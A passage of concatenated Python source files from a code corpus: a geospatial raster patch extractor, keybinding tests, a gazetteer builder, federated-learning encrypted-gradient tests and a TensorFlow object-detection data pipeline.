sigma=1, **kw):
"""
        Loads a tiff file describing an environmental raster into a numpy array.
        :param new_nan: the value used to replace NaN cells after loading
        :param path: the path of the raster (the directory)
        :param nan: the value to use when NaN numbers are present. If False, then default values will be used
:param normalized: if True the raster will be normalized (minus the mean and divided by std)
:param transform: if a function is given, it will be applied on each patch.
:param size: the size of a patch (size x size)
"""
self.path = path
self.no_data = new_nan
self.normalized = normalized
self.transform = transform
self.size = size
        path = re.sub(r'/+', '/', path)  # collapse repeated slashes
self.name = path.split('/')[-1] if path[-1] != '/' else path.split('/')[-2]
print(path + '/' + self.name + '_' + country + '.tif')
        # temporarily disable warnings to avoid the noisy rasterio warning emitted here
warnings.filterwarnings("ignore")
src = rasterio.open(path + '/' + self.name + '_' + country + '.tif', nodata=nan)
warnings.filterwarnings("default")
if src.meta['crs'] is None:
with open(path + '/' + 'GeoMetaData.csv') as f:
metadata = f.read()
m_split = metadata.split('\n')[1].split(';')
# loading file data
self.x_min = float(m_split[1])
self.y_min = float(m_split[2])
self.x_resolution = float(m_split[5])
self.y_resolution = float(m_split[6])
self.n_rows = int(m_split[3])
self.n_cols = int(m_split[4])
else:
self.x_min = src.bounds.left
self.y_min = src.bounds.bottom
self.x_resolution = src.res[0]
self.y_resolution = src.res[1]
self.n_rows = src.height
self.n_cols = src.width
print(self.x_min, self.y_min, self.x_resolution, self.y_resolution, self.n_rows, self.n_cols)
# some tiff do not contain geo data (stored in the file GeoMetaData)
# loading the raster
self.raster = np.squeeze(src.read())
src.close()
        # values below min_value are considered incorrect and therefore treated as no_data
self.raster[self.raster == nan] = new_nan
self.raster[np.isnan(self.raster)] = new_nan
if normalized:
# normalizing the whole raster given available data (therefore avoiding no_data)...
selected_cell = self.raster != nan
self.raster[selected_cell] = (self.raster[selected_cell] - mu) / sigma
# setting the shape of the raster
self.shape = self.raster.shape
def _get_patch(self, item):
"""
Avoid using this method directly
:param item: the GPS position (latitude, longitude)
:return: a patch
"""
row_num = int(self.n_rows - (item[0] - self.y_min) / self.y_resolution)
col_num = int((item[1] - self.x_min) / self.x_resolution)
# environmental vector
if self.size == 1:
patch = self.raster[row_num, col_num].astype(np.float)
else:
half_size = int(self.size/2)
patch = self.raster[
row_num-half_size:row_num+half_size,
col_num - half_size:col_num+half_size
].astype(np.float)
patch = patch[np.newaxis]
return patch
def __len__(self):
"""
:return: the depth of the tensor/vector...
"""
return 1
def __getitem__(self, item):
"""
The method to use to retrieve a patch.
:param item: GPS position (latitude, longitude)
:return: the extracted patch with eventually some transformations
"""
# item is a tuple of (latitude, longitude)
patch = self._get_patch(item)
if self.transform:
patch = self.transform(patch)
return patch
class PatchExtractor(object):
"""
PatchExtractor enables the extraction of an environmental tensor from multiple rasters given a GPS
position.
"""
def __init__(self, root_path, size=256, verbose=False, resolution=1.):
self.root_path = root_path
self.size = size
self.verbose = verbose
self.resolution = resolution
self.rasters_fr = []
self.rasters_us = []
def add_all(self, normalized=False, transform=None):
"""
Add all variables (rasters) available at root_path
:param normalized: if True, each raster will be normalized
:param transform: a function to apply on each patch
"""
for key in sorted(raster_metadata.keys()):
if 'ignore' not in raster_metadata[key]:
self.append(key, normalized=normalized, transform=transform)
def append(self, raster_name, **kwargs):
"""
This method append a new raster given its name
:param raster_name:
:param kwargs: nan, normalized, transform
"""
        # you may want to add rasters one by one if specific configurations are required on a
        # per-raster basis
print('Adding: ' + raster_name)
params = {**raster_metadata[raster_name]}
for k in kwargs.keys():
if kwargs[k] != 'default':
params[k] = kwargs[k]
r_us = Raster(self.root_path + '/' + raster_name, 'USA', size=self.size, **params)
r_fr = Raster(self.root_path + '/' + raster_name, 'FR', size=self.size, **params)
self.rasters_us.append(r_us)
self.rasters_fr.append(r_fr)
def clean(self):
"""
Remove all rasters from the extractor.
"""
print('Removing all rasters...')
self.rasters_fr = []
self.rasters_us = []
def __repr__(self):
return self.__str__()
def __str__(self):
str_ = ''
def raster_str(r):
result = ''
result += '-' * 50 + '\n'
result += 'title: ' + r.name + '\n'
result += '\t x_min: ' + str(r.x_min) + '\n'
result += '\t y_min: ' + str(r.y_min) + '\n'
result += '\t x_resolution: ' + str(r.x_resolution) + '\n'
result += '\t y_resolution: ' + str(r.y_resolution) + '\n'
result += '\t n_rows: ' + str(r.n_rows) + '\n'
result += '\t n_cols: ' + str(r.n_cols) + '\n'
return result
for r in self.rasters_fr:
str_ += raster_str(r)
for r in self.rasters_us:
str_ += raster_str(r)
return str_
def __getitem__(self, item):
"""
:param item: the GPS location (latitude, longitude)
:return: return the environmental tensor or vector (size>1 or size=1)
"""
rasters = self._raster(item)
if len(rasters) > 1:
return np.concatenate([r.__getitem__(item) for r in rasters])
else:
return np.array([rasters[0].__getitem__(item)])
def __len__(self):
"""
:return: the number of variables (not the size of the tensor when some variables have a one hot encoding
representation)
"""
return len(self.rasters_fr)
def _raster(self, item):
return self.rasters_fr if item[1] > -10. else self.rasters_us
def plot(self, item, return_fig=False, style='fivethirtyeight', nb_cols=5, alpha=1.):
"""
Plot an environmental tensor (size > 1)...
:param alpha:
:param nb_cols:
:param item: the GPS location (latitude, longitude)
:param return_fig: if True, the matplotlib fig will be returned, if False, it will be displayed
:param style: style of the chart
"""
if self.size > 1:
rasters = self._raster(item)
with plt.style.context(style):
metadata = [
(r.name,
[
item[1] - self.size // 2 * r.x_resolution,
item[1] + self.size // 2 * r.x_resolution,
item[0] - self.size // 2 * r.y_resolution,
item[0] + self.size // 2 * r.y_resolution]
) for r in rasters
]
# metadata are the name of the variable and the bounding box in latitude-longitude coordinates
# retrieve the patch... Eventually disabling the one hot encoding variables
patch = self.__getitem__(item)
# computing number of rows and columns...
nb_rows = (patch.shape[0] + (nb_cols-1)) // nb_cols
fig = plt.figure(figsize=(nb_cols * 6.4 * self.resolution, nb_rows * 4.8 * self.resolution))
for k, i in zip(metadata, range(patch.shape[0])):
plt.subplot(nb_rows, nb_cols, i + 1)
plt.title(k[0], fontsize=20)
p = np.squeeze(patch[i])
plt.imshow(p, extent=k[1], aspect='auto')
plt.colorbar()
fig.tight_layout()
fig.patch.set_alpha(alpha)
if return_fig:
return fig
else:
fig.show()
plt.close(fig)
else:
raise ValueError('Plot works only for tensors: size must be > 1...')
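# Hedged usage sketch (added for illustration, not part of the original module): the raster
# directory and the GPS position below are assumptions; each variable is expected to live in
# <rasters_root>/<name>/<name>_<country>.tif next to its GeoMetaData.csv.
if __name__ == '__main__':
    extractor = PatchExtractor('/path/to/rasters', size=64)
    extractor.append('bio_1', normalized=True)
    extractor.append('bio_2', normalized=True)
    patch = extractor[(43.61, 3.88)]  # (latitude, longitude); longitude > -10 selects the FR rasters
    print(patch.shape)                # -> (2, 64, 64), one channel per appended raster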
|
the-stack_106_23825 | import pytest
from keybind import KeyBinder, configure_logging
def test_basic(xlib_mock):
configure_logging()
xlib_mock.register_events([
(1, 'K'),
(1, 'J'),
(1, 'pass'), # captured, no handler
(0, 'pass'), # non captured
])
pressed = []
with pytest.raises(IndexError):
KeyBinder.activate({
'Ctrl-K': lambda: pressed.append('Ctrl-K'),
'J': lambda: pressed.append('J'),
10: lambda: pressed.append('10'),
})
# Try bogus grab key.
xlib_mock.register_error('errr', 'ev')
with pytest.raises(IndexError):
KeyBinder.activate({
'bogus': lambda: None,
})
# Try sniffing.
with pytest.raises(IndexError):
KeyBinder.activate()
def test_thread(xlib_mock):
KeyBinder.activate({
'J': lambda: None,
}, run_thread=True)
@pytest.mark.parametrize("key_input, expected_result",
[
("J", ([], "J")),
("Ctrl-J", (["Ctrl"], "J")),
("Ctrl-Alt-J", (["Ctrl", "Alt"], "J")),
("", ([], "")),
]
)
def test_parse_key_valid_input(key_input, expected_result, xlib_mock):
# GIVEN valid input describing a key or key combination
# WHEN the input is parsed
binder = KeyBinder()
# THEN the expected result is returned
assert binder._parse_key(key_input) == expected_result
def test_parse_key_invalid_input(xlib_mock):
# GIVEN a list of valid input types and input that is not one of those
valid_input_types = [str, int]
invalid_input = ["Ctrl", "J"]
assert type(invalid_input) not in valid_input_types
# WHEN the input gets parsed
binder = KeyBinder()
# THEN a TypeError is raised
with pytest.raises(TypeError):
binder._parse_key(invalid_input)
|
the-stack_106_23826 | from sys import argv, stderr
from pickle import dump
from copy import copy
if len(argv) != 4:
stderr.write('USAGE: %s infobox_categories redirects ofile\n' % argv[0])
exit(1)
info_categories = {w:c for w,c in [l.split('\t') for l in open(argv[1]).read().split('\n') if l != '']}
redirects = {w:r for w,r in [l.split('\t') for l in open(argv[2]).read().split('\n') if l != '']}
ofile = open(argv[3],'wb')
for w, r in redirects.items():
if not w in info_categories:
if r in info_categories:
info_categories[w] = info_categories[r]
gazetteer = {}
for w,c in info_categories.items():
k = w
if w[-1] == ')' and w.count(' (') == 1:
ind = w.find(' (')
k = w[:ind]
if not k in gazetteer:
gazetteer[k] = set()
gazetteer[k].add(c)
gazetteer_lc = copy(gazetteer)
for w,c in gazetteer.items():
if not w.lower() in gazetteer:
gazetteer_lc[w.lower()] = c
dump(gazetteer_lc,ofile)
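# Illustrative note (assumptions about the expected inputs, added for clarity): both input
# files are tab-separated with one "<title>\t<value>" pair per line, e.g.
#   infobox_categories:  Paris<TAB>settlement
#   redirects:           City of Light<TAB>Paris
# After the merge above, both "City of Light" and "city of light" map to {"settlement"},
# and parenthesised disambiguations such as "Paris (mythology)" are keyed as "Paris".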
|
the-stack_106_23830 | #
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
import numpy as np
from arch.api.session import init
from federatedml.ftl.encryption import encryption
from federatedml.ftl.test.mock_models import MockAutoencoder
from federatedml.ftl.test.whitebox_plain_gradients_test import run_one_party_msg_exchange
from federatedml.secureprotol.encrypt import PaillierEncrypt
class TestEncryptedGradients(unittest.TestCase):
def setUp(self):
paillierEncrypt = PaillierEncrypt()
paillierEncrypt.generate_key()
self.public_key = paillierEncrypt.get_public_key()
self.private_key = paillierEncrypt.get_privacy_key()
def test_party_b_gradient_checking_test(self):
U_A = np.array([[1, 2, 3, 4, 5],
[4, 5, 6, 7, 8],
[7, 8, 9, 10, 11],
[4, 5, 6, 7, 8]])
U_B = np.array([[4, 2, 3, 1, 2],
[6, 5, 1, 4, 5],
[7, 4, 1, 9, 10],
[6, 5, 1, 4, 5]])
y = np.array([[1], [-1], [1], [-1]])
overlap_indexes = [1, 2]
non_overlap_indexes = [0, 3]
Wh = np.ones((4, U_A.shape[1]))
bh = np.zeros(U_A.shape[1])
autoencoderA = MockAutoencoder(0)
autoencoderA.build(U_A.shape[1], Wh, bh)
autoencoderB = MockAutoencoder(1)
autoencoderB.build(U_B.shape[1], Wh, bh)
partyA, partyB = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A, U_B, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_B_1 = partyB.get_loss_grads()
loss1 = partyA.send_loss()
U_B_prime = np.array([[4, 2, 3, 1, 2],
[6, 5, 1.001, 4, 5],
[7, 4, 1, 9, 10],
[6, 5, 1, 4, 5]])
partyA, partyB = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A, U_B_prime, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_B_2 = partyB.get_loss_grads()
loss2 = partyA.send_loss()
loss_grads_B_1 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_B_1))
loss_grads_B_2 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_B_2))
loss1 = encryption.decrypt(self.private_key, loss1)
loss2 = encryption.decrypt(self.private_key, loss2)
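        # Numerical gradient check: one entry of U_B was perturbed by eps = 0.001 above, so
        # (loss2 - loss1) / eps approximates the analytic gradient for that entry.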
grad_approx = (loss2 - loss1) / 0.001
grad_real = loss_grads_B_1[0, 2]
grad_diff = np.abs(grad_approx - grad_real)
assert grad_diff < 0.001
def test_party_a_gradient_checking_test(self):
U_A = np.array([[1, 2, 3, 4, 5],
[4, 5, 6, 7, 8],
[7, 8, 9, 10, 11],
[4, 5, 6, 7, 8]])
U_B = np.array([[4, 2, 3, 1, 2],
[6, 5, 1, 4, 5],
[7, 4, 1, 9, 10],
[6, 5, 1, 4, 5]])
y = np.array([[1], [-1], [1], [-1]])
overlap_indexes = [1, 2]
non_overlap_indexes = [0, 3]
Wh = np.ones((4, U_A.shape[1]))
bh = np.zeros(U_A.shape[1])
autoencoderA = MockAutoencoder(0)
autoencoderA.build(U_A.shape[1], Wh, bh)
autoencoderB = MockAutoencoder(1)
autoencoderB.build(U_B.shape[1], Wh, bh)
partyA, _ = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A, U_B, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_A_1 = partyA.get_loss_grads()
loss1 = partyA.send_loss()
U_A_prime = np.array([[1, 2, 3, 4, 5],
[4, 5.001, 6, 7, 8],
[7, 8, 9, 10, 11],
[4, 5, 6, 7, 8]])
partyA, _ = run_one_party_msg_exchange(autoencoderA, autoencoderB, U_A_prime, U_B, y, overlap_indexes,
non_overlap_indexes, self.public_key, self.private_key, True)
loss_grads_A_2 = partyA.get_loss_grads()
loss2 = partyA.send_loss()
loss_grads_A_1 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_A_1))
loss_grads_A_2 = np.array(encryption.decrypt_matrix(self.private_key, loss_grads_A_2))
loss1 = encryption.decrypt(self.private_key, loss1)
loss2 = encryption.decrypt(self.private_key, loss2)
grad_approx = (loss2 - loss1) / 0.001
grad_real = loss_grads_A_1[1, 1]
grad_diff = np.abs(grad_approx - grad_real)
assert grad_diff < 0.001
if __name__ == '__main__':
init()
unittest.main()
|
the-stack_106_23831 | import tensorflow as tf
from .configuration import get_defaults
from .tfrecords_utils import read_tfrecords
from . import utils
def load_image(im_id, image_size, image_folder, image_format):
"""Resolve the correct image path from the given arguments.
Args:
im_id: image id saved in the tfrecords
image_size: integer specifying the square size to resize the image to
image_folder: image folder path
image_format: Used to resolve the correct image path and format
Returns:
The loaded image as a 3D Tensor
"""
if image_format == 'vedai': # VEDAI
filename = image_folder + '/' + tf.as_string(im_id, fill='0', width=8) + '_co.png'
img_type = 'png'
elif image_format == 'sdd': # STANFORD DRONE DATASET
filename = image_folder + '/' + tf.as_string(im_id, fill='0', width=8) + '.jpeg'
img_type = 'jpg'
else:
raise NotImplementedError("Unrecognized image format `%s`" % image_format)
# Parse image
image = tf.read_file(filename)
if img_type == 'jpg':
image = tf.image.decode_jpeg(image, channels=3)
elif img_type == 'png':
image = tf.image.decode_png(image, channels=3)
else:
raise NotImplementedError('unknown image type %s' % img_type)
image = tf.image.convert_image_dtype(image, tf.float32)
# Resize image
image = tf.image.resize_images(image, (image_size, image_size))
return image
def parse_basic_feature(parsed_features, image_folder, image_format, image_size=448):
""""Parse TFRecords features.
Args:
parsed_features: Parsed TFRecords features.
num_classes: Number of classes in the dataset. Used to infer the dataset.
image_folder: Image directory.
image_format: Used to resolve the correct image path and format.
image_size: Resize to the given image size. Defaults to 448.
Returns:
image_id, an integer (exact format depends on the dataset)
image, Tensor with values in [0, 1], shape (image_size, image_size, 3)
num_boxes, Number of valid boxes for this image
bounding_boxes, Bounding boxes for this image, shape (max_num_bbs, 4)
"""
im_id = tf.cast(parsed_features['im_id'], tf.int32)
image = load_image(im_id, image_size, image_folder, image_format)
num_boxes = tf.cast(parsed_features['num_boxes'], tf.int32)
bounding_boxes = parsed_features["bounding_boxes"]
return {'im_id': im_id,
'image': image,
'num_boxes': num_boxes,
'bounding_boxes': bounding_boxes}
def apply_data_augmentation(in_, data_augmentation_threshold):
""" Perform data augmentation (left/right flip).
Args:
in_: A batch from the dataset (output of iterator.get_next())
data_augmentation_threshold: threshold in [0, 1]
Returns:
Dataset with left/right data augmentation applied
"""
condition_shape = tf.shape(in_['image'])[:1]
condition = (tf.random_uniform(condition_shape) >= data_augmentation_threshold)
# Flip image
in_['image'] = tf.where(condition, in_['image'], tf.reverse(in_['image'], [2]))
# Set is_flipped flag
in_['is_flipped'] = tf.where(condition, in_['is_flipped'], 1. - in_['is_flipped'])
# Flip bounding boxes coordinates, (batch, num_bbs, 4)
in_['bounding_boxes'] = tf.where(condition, in_['bounding_boxes'],
tf.abs([1., 0., 1., 0.] - tf.gather(in_['bounding_boxes'], [2, 1, 0, 3], axis=-1)))
# Flip active/empty cell mask, (batch, num_cells_x, num_cells_y, 1, num_bbs)
in_['obj_i_mask_bbs'] = tf.where(condition, in_['obj_i_mask_bbs'], tf.reverse(in_['obj_i_mask_bbs'], [2]))
# Flip groups bounding boxes coordinates, (batch, num_cells, num_cells, 1, 4)
if 'group_bounding_boxes_per_cell' in in_:
in_['group_bounding_boxes_per_cell'] = tf.where(
condition, in_['group_bounding_boxes_per_cell'], tf.abs([1., 0., 1., 0.] - tf.gather(
tf.reverse(in_['group_bounding_boxes_per_cell'], [2]), [2, 1, 0, 3], axis=-1)))
# Flip groups ground-truth flags, (batch, num_cells, num_cells, 1, 1)
if 'group_flags' in in_:
in_['group_flags'] = tf.where(condition, in_['group_flags'], tf.reverse(in_['group_flags'], [2]))
# Flip groups classes, (batch, num_cells, num_cells, 1, num_classes)
if 'group_class_labels' in in_:
in_['group_class_labels'] = tf.where(condition, in_['group_class_labels'],
tf.reverse(in_['group_class_labels'], [2]))
# Return
return in_
def get_tf_dataset(tfrecords_file,
record_keys,
image_format,
max_num_bbs,
with_groups=True,
grouping_method='intersect',
grid_offsets=None,
with_classes=False,
num_classes=None,
batch_size=1,
drop_remainder=False,
num_epochs=1,
image_size=1024,
image_folder='',
data_augmentation_threshold=0.5,
num_devices=1,
num_threads=4,
shuffle_buffer=1,
prefetch_capacity=1,
make_initializable_iterator=False,
verbose=1):
"""Parse and load inputs from the given TFRecords as a tf.data.Dataset.
Args:
tfrecords_file: Path to the TFRecords file containing the data.
record_keys: Feature keys present in the TFrecords. Loaded from the metadata file
max_num_bbs: Maximum number of bounding boxes in the dataset. Used for reshaping the `bounding_boxes` records.
num_classes: Number of classes in the dataset. Only used if with_classes is True
with_classes: wheter to use class information
with_groups: whether to pre-compute grouped instances ground-truth
grid_offsets: Precomputed grid offsets
batch_size: Batch size.
num_epochs: Number of epochs to repeat.
image_size: The square size which to resize images to.
image_folder: path to the directory containing the images in the dataset.
        data_augmentation_threshold: Data augmentation probability (in [0, 1])
num_devices: Number of devices
num_threads: Number of readers for the batch queue.
shuffle_buffer: Size of the shuffling buffer.
prefetch_capacity: Buffer size for prefetching.
        make_initializable_iterator: if True, make an initializable iterator and add its initializer to the collection `iterator_init`
verbose: Verbosity level
Returns:
        A tf.data.Dataset iterator (and its initializer if make_initializable_iterator is True)
"""
assert grouping_method in ['intersect', 'intersect_with_density', 'unique_intersect']
assert not (with_classes and num_classes is None)
assert len(record_keys)
assert batch_size > 0
assert image_size > 0
assert 0. <= data_augmentation_threshold <= 1.
if grid_offsets is not None:
num_cells = grid_offsets.shape[:2]
assert num_devices > 0
assert num_threads > 0
assert shuffle_buffer > 0
if verbose == 2:
print(' \033[31m> load_inputs\033[0m')
elif verbose == 1:
print(' > load_inputs')
# Normalize grid cells offsets
if grid_offsets is not None:
grid_offsets_mins = grid_offsets / num_cells
grid_offsets_maxs = (grid_offsets + 1.) / num_cells
# Create TFRecords feature
features = read_tfrecords(record_keys, max_num_bbs=max_num_bbs)
def parsing_function(example_proto):
# Basic features
parsed_features = tf.parse_single_example(example_proto, features)
output = parse_basic_feature(parsed_features, image_folder, image_format, image_size=image_size)
bounding_boxes = output['bounding_boxes']
# Empty/active cells mask
# obj_i_mask_bbs: (num_cells, num_cells, 1, num_bbs)
mins, maxs = tf.split(bounding_boxes, 2, axis=-1) # (num_bbs, 2)
inters = tf.maximum(0., tf.minimum(maxs, grid_offsets_maxs) - tf.maximum(mins, grid_offsets_mins))
inters = tf.reduce_prod(inters, axis=-1)
obj_i_mask = tf.expand_dims(tf.to_float(inters > 0.) , axis=-2)
output["obj_i_mask_bbs"] = obj_i_mask
# Grouped instances
# group_bounding_boxes_per_cell: (num_cells, num_cells, 1, 4), cell bounding box after grouping
# group_flags: (num_cells, num_cells, 1, 1), whether a cell contains a group or not
# num_group_boxes: (), number of bounding boxes after grouping
if with_groups:
## Define group_mask: (num_cells, num_cells, num_bbs, 1)
## Maps each gt bounding box to a grid cell to be merged into a group
if grouping_method == 'intersect_with_density':
obj_i_mask = tf.expand_dims(tf.to_float(inters > 0.) , axis=-2)
obj_i_mask *= tf.expand_dims(tf.to_float(inters < 1. / (num_cells[0] * num_cells[1])) , axis=-2)
group_mask = tf.transpose(obj_i_mask, (0, 1, 3, 2)) # (num_cells, num_cells, num_bbs, 1)
elif grouping_method == 'unique_intersect':
# weight 1: Intersection between gt boxes and cells
# Upper bounded by 1
# (num_cells, num_cells, num_bbs)
w1 = inters * num_cells[0] * num_cells[1]
                # weight 2: opposite of how many objects co-occur in each cell
# Upper bounded by 1
# (num_cells, num_cells, 1)
w2 = 1. - tf.reduce_sum(obj_i_mask, axis=-1) / tf.to_float(output['num_boxes'])
# Assign each ground-truth to one unique group
group_mask = w1 * w2
group_mask = tf.to_float(group_mask > 0.) * tf.to_float(group_mask >= tf.reduce_max(group_mask, axis=(0, 1), keep_dims=True))
group_mask = tf.expand_dims(group_mask, axis=-1)
elif grouping_method == 'intersect':
group_mask = tf.transpose(obj_i_mask, (0, 1, 3, 2)) # (num_cells, num_cells, num_bbs, 1)
## Merge bbs coocurring in the same cell to form groups
mins = mins + 1. - group_mask
mins = tf.reduce_min(mins, axis=2, keep_dims=True) # (num_cells, num_cells, 1, 2)
maxs = maxs * group_mask
maxs = tf.reduce_max(maxs, axis=2, keep_dims=True)
group_bounding_boxes_per_cell = tf.concat([mins, maxs], axis=-1)
group_bounding_boxes_per_cell = tf.clip_by_value(group_bounding_boxes_per_cell, 0., 1.)
output["group_bounding_boxes_per_cell"] = group_bounding_boxes_per_cell
num_bbs_per_cell = tf.reduce_sum(group_mask, axis=2, keep_dims=True)
num_group_boxes = tf.reduce_sum(tf.to_int32(num_bbs_per_cell > 0))
output["num_group_boxes"] = num_group_boxes
group_flags = tf.maximum(tf.minimum(num_bbs_per_cell, 2.) - 1., 0.)
output["group_flags"] = group_flags
# is_flipped flag: (), indicates whether the image has been flipped during data augmentation
output["is_flipped"] = tf.constant(0.)
# Optional : add classes
if with_classes:
class_labels = tf.one_hot(parsed_features['classes'], num_classes,
axis=-1, on_value=1, off_value=0, dtype=tf.int32)
output['class_labels'] = class_labels
# Group classes (majority vote) # (num_cells, num_cells, 1, num_classes)
if with_groups:
percell_class_labels = tf.expand_dims(tf.expand_dims(class_labels, axis=0), axis=0)
percell_class_labels = group_mask * tf.to_float(percell_class_labels)
percell_class_labels = tf.reduce_sum(percell_class_labels, axis=2, keep_dims=True)
group_class_labels = tf.argmax(percell_class_labels, axis=-1)
group_class_labels = tf.one_hot(group_class_labels, num_classes,
axis=-1, on_value=1, off_value=0, dtype=tf.int32)
group_class_labels = tf.to_int32(percell_class_labels * tf.to_float(group_class_labels))
output["group_class_labels"] = group_class_labels
return output
## Create the dataset
with tf.name_scope('load_dataset'):
# Parse data
dataset = tf.data.TFRecordDataset(tfrecords_file)
# Map
dataset = dataset.shuffle(buffer_size=shuffle_buffer)
dataset = dataset.map(parsing_function, num_parallel_calls=num_threads)
# Repeat
if num_epochs > 1:
dataset = dataset.repeat(num_epochs)
# Batch
if tf.__version__ == '1.4.0':
dataset = dataset.batch(batch_size * num_devices)
else:
dataset = dataset.batch(batch_size * num_devices, drop_remainder=drop_remainder)
# Prefetch
if prefetch_capacity > 0:
dataset = dataset.prefetch(prefetch_capacity)
# Iterator
if make_initializable_iterator:
iterator = dataset.make_initializable_iterator()
iterator_init = iterator.initializer
tf.add_to_collection('iterator_init', iterator_init)
else:
iterator = dataset.make_one_shot_iterator()
iterator_init = None
batch = iterator.get_next()
## Apply data augmentation
with tf.name_scope('data_augmentation'):
if data_augmentation_threshold > 0.:
batch = apply_data_augmentation(batch, data_augmentation_threshold)
## Split across device
slice_dims = [0] * num_devices
unpadded_batch = tf.to_int32(tf.shape(batch['im_id'])[0])
for i in range(num_devices):
slice_dims[i] = tf.maximum(0, tf.minimum(batch_size, unpadded_batch))
unpadded_batch -= batch_size
inputs = [{} for _ in range(num_devices)]
for key, value in batch.items():
for i, split_value in enumerate(tf.split(value, slice_dims, axis=0)):
inputs[i][key] = split_value
## Verbose log
if verbose == 2:
print('\n'.join(" \033[32m%s\033[0m: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in inputs[0].items()))
elif verbose == 1:
print('\n'.join(" *%s*: shape=%s, dtype=%s" % (key, value.get_shape().as_list(), value.dtype)
for key, value in inputs[0].items()))
return inputs, iterator_init
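# Hedged usage sketch (added for illustration, not from the original project): every path and
# constant below is an assumption; grid_offsets is normally precomputed elsewhere in the code.
def _example_get_tf_dataset():
    import numpy as np
    grid_offsets = np.stack(
        np.meshgrid(np.arange(16), np.arange(16), indexing='ij'), axis=-1).astype(np.float32)
    inputs, _ = get_tf_dataset(
        'train.tfrecords',
        record_keys=['im_id', 'num_boxes', 'bounding_boxes'],
        image_format='vedai',
        max_num_bbs=32,
        grid_offsets=grid_offsets,
        batch_size=8,
        image_size=448,
        image_folder='data/vedai/images')
    return inputs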
def filter_individuals(predicted_boxes, predicted_scores, predicted_group_flags, strong_confidence_threshold=1.0):
"""Filter out individuals predictions with confidence higher than the given threhsold"""
# should_be_refined: (batch, num_boxes, 1) : groups and not strongly confident individuals
if predicted_group_flags is not None:
is_not_strongly_confident = tf.to_float(predicted_scores <= strong_confidence_threshold)
# is_group: (batch, num_boxes, 1)
is_group = tf.to_float(tf.nn.sigmoid(predicted_group_flags) > 0.5)
is_group = utils.flatten_percell_output(is_group)
should_be_refined = tf.minimum(1., is_group + is_not_strongly_confident)
else:
should_be_refined = tf.to_float(predicted_scores <= strong_confidence_threshold)
# Filter them out from potential crops
predicted_scores *= should_be_refined
predicted_boxes *= should_be_refined
# Return filtered boxes and filter
return predicted_boxes, predicted_scores, tf.squeeze(1. - should_be_refined, axis=-1)
def filter_threshold(predicted_boxes, predicted_scores, confidence_threshold=-1.):
"""Filter out boxes with confidence below the given threshold"""
filtered = tf.to_float(predicted_scores > confidence_threshold)
predicted_scores *= filtered
predicted_boxes *= filtered
return predicted_boxes, predicted_scores
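# Minimal sketch (added for clarity, not from the original code): filter_threshold zeroes out
# every box whose confidence is at or below the threshold. Shapes and values are made up.
def _example_filter_threshold():
    boxes = tf.constant([[[0.1, 0.1, 0.5, 0.5], [0.2, 0.2, 0.9, 0.9]]])  # (1, 2, 4)
    scores = tf.constant([[[0.3], [0.8]]])                               # (1, 2, 1)
    kept_boxes, kept_scores = filter_threshold(boxes, scores, confidence_threshold=0.5)
    return kept_boxes, kept_scores  # the first box and its score are zeroed out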
def extract_groups(predicted_boxes,
predicted_scores,
predicted_group_flags=None,
predicted_offsets=None,
mode='train',
verbose=False,
epsilon=1e-8,
**kwargs):
""" Extract crops from the outputs of intermediate stage.
Args:
predicted_boxes: A (batch_size, num_cells, num_cells, num_boxes, 4) array
predicted_scores: A (batch_size, num_cells, num_cells, num_boxes, 1) array
predicted_group_flags: A (batch_size, num_cells, num_cells, num_boxes, 1) array
predicted_offsets: A (batch_size, num_cells, num_cells, num_boxes, 2) array
        mode: If test, the boxes are only passed to the next stage if they are worth being refined
            (i.e. groups or imprecise individuals)
Kwargs:
{train, test}_patch_confidence_threshold: Minimum confidence threshold to qualify for refinement
patch_nms_threshold: NMS threshold
{train, test}_num_crops: Number of crops to extract
test_patch_strong_confidence_threshold: high confidence threshold
        previous_batch_size: Batch size of the previous stage (for which `predicted_boxes` were output). Needs
            to be statically known for the NMS loop.
    Returns:
Extracted crops and their confidence scores
"""
if mode == 'train': # train time
(confidence_threshold, nms_threshold, num_outputs) = get_defaults(
kwargs, ['train_patch_confidence_threshold', 'train_patch_nms_threshold', 'train_num_crops'], verbose=verbose)
elif mode in ['val', 'test']: # inference
(confidence_threshold, nms_threshold, num_outputs) = get_defaults(
kwargs, ['test_patch_confidence_threshold', 'test_patch_nms_threshold', 'test_num_crops'], verbose=verbose)
else:
raise ValueError('Unknown mode', mode)
if verbose:
print(' extracting %d crops' % num_outputs)
## Flatten
# predicted_score: (batch, num_boxes, 1)
# predicted_boxes: (batch, num_boxes, 4)
with tf.name_scope('flat_output'):
predicted_boxes = utils.flatten_percell_output(predicted_boxes)
predicted_scores = utils.flatten_percell_output(predicted_scores)
## Filter
kept_out_filter = tf.zeros(tf.shape(predicted_scores)) # default
with tf.name_scope('filter_groups'):
# At test time, we keep out individual confidences with high confidence
# we save these `shortcut` boxes in the `kept_out_filter` Tensor
if mode in ['test', 'val']:
strong_confidence_threshold = get_defaults(
kwargs, ['test_patch_strong_confidence_threshold'], verbose=verbose)[0]
if isinstance(strong_confidence_threshold, tf.Tensor) or strong_confidence_threshold < 1.0:
predicted_boxes, predicted_scores, kept_out_filter = filter_individuals(
predicted_boxes, predicted_scores, predicted_group_flags, strong_confidence_threshold)
# Additionally, we filter out boxes with confidence below the threshold
if isinstance(confidence_threshold, tf.Tensor) or confidence_threshold > 0.:
with tf.name_scope('filter_confidence'):
predicted_boxes, predicted_scores = filter_threshold(
predicted_boxes, predicted_scores, confidence_threshold)
## Rescale remaining boxes with the learned offsets
with tf.name_scope('offsets_rescale_boxes'):
